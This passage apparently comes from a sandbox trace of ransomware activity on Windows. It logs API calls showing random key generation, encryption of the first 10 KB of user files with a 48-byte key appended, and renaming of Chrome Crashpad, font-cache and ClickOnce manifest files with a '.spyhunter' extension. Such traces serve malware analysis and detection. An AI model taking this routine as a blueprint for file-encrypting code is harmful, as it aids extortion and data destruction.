lpOverlapped=0x0) returned 1 [0132.289] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f3b4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f3b4*=0x30, lpOverlapped=0x0) returned 1 [0132.289] CloseHandle (hObject=0x158) returned 1 [0132.289] GetProcessHeap () returned 0x2c0000 [0132.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0132.289] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat.spyhunter") returned 103 [0132.289] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat.spyhunter")) returned 1 [0132.290] GetProcessHeap () returned 0x2c0000 [0132.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0132.290] GetProcessHeap () returned 0x2c0000 [0132.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0132.290] GetProcessHeap () returned 0x2c0000 [0132.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c886f0 | out: hHeap=0x2c0000) returned 1 [0132.291] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f3f0 | out: pbBuffer=0x270f3f0) returned 1 [0132.291] GetProcessHeap () returned 0x2c0000 [0132.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0132.291] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f3e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f3e8*=0x30) returned 1 [0132.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\metadata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.291] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata") returned 89 [0132.291] StrStrW (lpFirst="metadata", lpSrch=".txt") returned 0x0 [0132.291] GetProcessHeap () returned 0x2c0000 [0132.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.292] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f3ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f3ac*=0x0, lpOverlapped=0x0) returned 1 [0132.292] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.292] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x270f3ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f3ac*=0x0, lpOverlapped=0x0) returned 1 [0132.292] GetProcessHeap () returned 0x2c0000 [0132.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.292] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.292] WriteFile (in: hFile=0x158, lpBuffer=0x270f3ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f3ac, lpOverlapped=0x0 | out: lpBuffer=0x270f3ec*, lpNumberOfBytesWritten=0x270f3ac*=0x4, lpOverlapped=0x0) returned 1 [0132.293] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f3ac, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f3ac*=0x30, lpOverlapped=0x0) returned 1 [0132.293] CloseHandle (hObject=0x158) returned 1 [0132.293] GetProcessHeap () returned 0x2c0000 [0132.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0132.293] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata.spyhunter") returned 99 [0132.293] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\metadata"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\metadata.spyhunter")) returned 1 [0132.347] GetProcessHeap () returned 0x2c0000 [0132.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0132.347] GetProcessHeap () returned 0x2c0000 [0132.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0132.347] GetProcessHeap () returned 0x2c0000 [0132.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45028 | out: hHeap=0x2c0000) returned 1 [0132.356] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f3e8 | out: pbBuffer=0x270f3e8) returned 1 [0132.356] GetProcessHeap () returned 0x2c0000 [0132.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0132.356] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f3e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f3e0*=0x30) returned 1 [0132.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT") returned 67 [0132.357] StrStrW (lpFirst="GDIPFONTCACHEV1.DAT", lpSrch=".txt") returned 0x0 [0132.357] GetProcessHeap () returned 0x2c0000 [0132.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.357] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f3a4*=0x2800, lpOverlapped=0x0) returned 1 [0132.381] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.381] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f3a4*=0x2800, lpOverlapped=0x0) returned 1 [0132.381] GetProcessHeap () returned 0x2c0000 [0132.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.381] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.381] WriteFile (in: hFile=0x158, lpBuffer=0x270f3e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f3a4, lpOverlapped=0x0 | out: lpBuffer=0x270f3e4*, lpNumberOfBytesWritten=0x270f3a4*=0x4, lpOverlapped=0x0) returned 1 [0132.445] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f3a4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f3a4*=0x30, lpOverlapped=0x0) returned 1 [0132.446] CloseHandle (hObject=0x158) returned 1 [0132.446] GetProcessHeap () returned 0x2c0000 [0132.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0132.446] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.spyhunter") returned 77 [0132.446] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat.spyhunter")) returned 1 [0132.447] GetProcessHeap () returned 0x2c0000 [0132.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0132.447] GetProcessHeap () returned 0x2c0000 [0132.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0132.447] GetProcessHeap () returned 0x2c0000 [0132.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08208 | out: hHeap=0x2c0000) returned 1 [0132.452] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f3d0 | out: pbBuffer=0x270f3d0) returned 1 [0132.453] GetProcessHeap () returned 0x2c0000 [0132.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0132.453] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f3c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f3c8*=0x30) returned 1 [0132.453] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.454] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest") returned 161 [0132.454] StrStrW (lpFirst="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpSrch=".txt") returned 0x0 [0132.454] GetProcessHeap () returned 0x2c0000 [0132.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.454] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f38c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f38c*=0x2800, lpOverlapped=0x0) returned 1 [0132.455] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.455] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f38c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f38c*=0x2800, lpOverlapped=0x0) returned 1 [0132.455] GetProcessHeap () returned 0x2c0000 [0132.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.455] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.455] WriteFile (in: hFile=0x158, lpBuffer=0x270f3cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f38c, lpOverlapped=0x0 | out: lpBuffer=0x270f3cc*, lpNumberOfBytesWritten=0x270f38c*=0x4, lpOverlapped=0x0) returned 1 [0132.456] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f38c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f38c*=0x30, lpOverlapped=0x0) returned 1 [0132.456] CloseHandle (hObject=0x158) returned 1 [0132.456] GetProcessHeap () returned 0x2c0000 [0132.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0132.456] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.spyhunter") returned 171 [0132.456] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.spyhunter")) returned 1 [0132.456] GetProcessHeap () returned 0x2c0000 [0132.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0132.457] GetProcessHeap () returned 0x2c0000 [0132.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0132.457] GetProcessHeap () returned 0x2c0000 [0132.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de7e90 | out: hHeap=0x2c0000) returned 1 [0132.457] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f3c8 | out: pbBuffer=0x270f3c8) returned 1 [0132.457] GetProcessHeap () returned 0x2c0000 [0132.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0132.457] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f3c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f3c0*=0x30) returned 1 [0132.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.457] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms") returned 159 [0132.457] StrStrW (lpFirst="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms", lpSrch=".txt") returned 0x0 [0132.457] GetProcessHeap () returned 0x2c0000 [0132.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.457] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f384, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f384*=0x2800, lpOverlapped=0x0) returned 1 [0132.468] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.468] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f384, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f384*=0x2800, lpOverlapped=0x0) returned 1 [0132.468] GetProcessHeap () returned 0x2c0000 [0132.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.469] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.469] WriteFile (in: hFile=0x158, lpBuffer=0x270f3c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f384, lpOverlapped=0x0 | out: lpBuffer=0x270f3c4*, lpNumberOfBytesWritten=0x270f384*=0x4, lpOverlapped=0x0) returned 1 [0132.470] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f384, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f384*=0x30, lpOverlapped=0x0) returned 1 [0132.470] CloseHandle (hObject=0x158) returned 1 [0132.470] GetProcessHeap () returned 0x2c0000 [0132.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0132.470] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms.spyhunter") returned 169 [0132.470] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.cdf-ms.spyhunter")) returned 1 [0132.471] GetProcessHeap () returned 0x2c0000 [0132.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0132.471] GetProcessHeap () returned 0x2c0000 [0132.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0132.471] GetProcessHeap () returned 0x2c0000 [0132.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de7d08 | out: hHeap=0x2c0000) returned 1 [0132.471] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f3c8 | out: pbBuffer=0x270f3c8) returned 1 [0132.471] GetProcessHeap () returned 0x2c0000 [0132.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0132.471] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f3c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f3c0*=0x30) returned 1 [0132.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.472] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest") returned 161 [0132.472] StrStrW (lpFirst="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpSrch=".txt") returned 0x0 [0132.472] GetProcessHeap () returned 0x2c0000 [0132.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.472] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f384, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f384*=0x2800, lpOverlapped=0x0) returned 1 [0132.474] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.474] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f384, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f384*=0x2800, lpOverlapped=0x0) returned 1 [0132.474] GetProcessHeap () returned 0x2c0000 [0132.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.474] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.474] WriteFile (in: hFile=0x158, lpBuffer=0x270f3c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f384, lpOverlapped=0x0 | out: lpBuffer=0x270f3c4*, lpNumberOfBytesWritten=0x270f384*=0x4, lpOverlapped=0x0) returned 1 [0132.475] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f384, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f384*=0x30, lpOverlapped=0x0) returned 1 [0132.476] CloseHandle (hObject=0x158) returned 1 [0132.476] GetProcessHeap () returned 0x2c0000 [0132.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0132.476] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.spyhunter") returned 171 [0132.476] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.spyhunter")) returned 1 [0132.477] GetProcessHeap () returned 0x2c0000 [0132.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0132.477] GetProcessHeap () returned 0x2c0000 [0132.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0132.477] GetProcessHeap () returned 0x2c0000 [0132.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de7b78 | out: hHeap=0x2c0000) returned 1 [0132.477] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f3c0 | out: pbBuffer=0x270f3c0) returned 1 [0132.477] GetProcessHeap () returned 0x2c0000 [0132.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0132.477] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f3b8*=0x20, dwBufLen=0x30 | out: 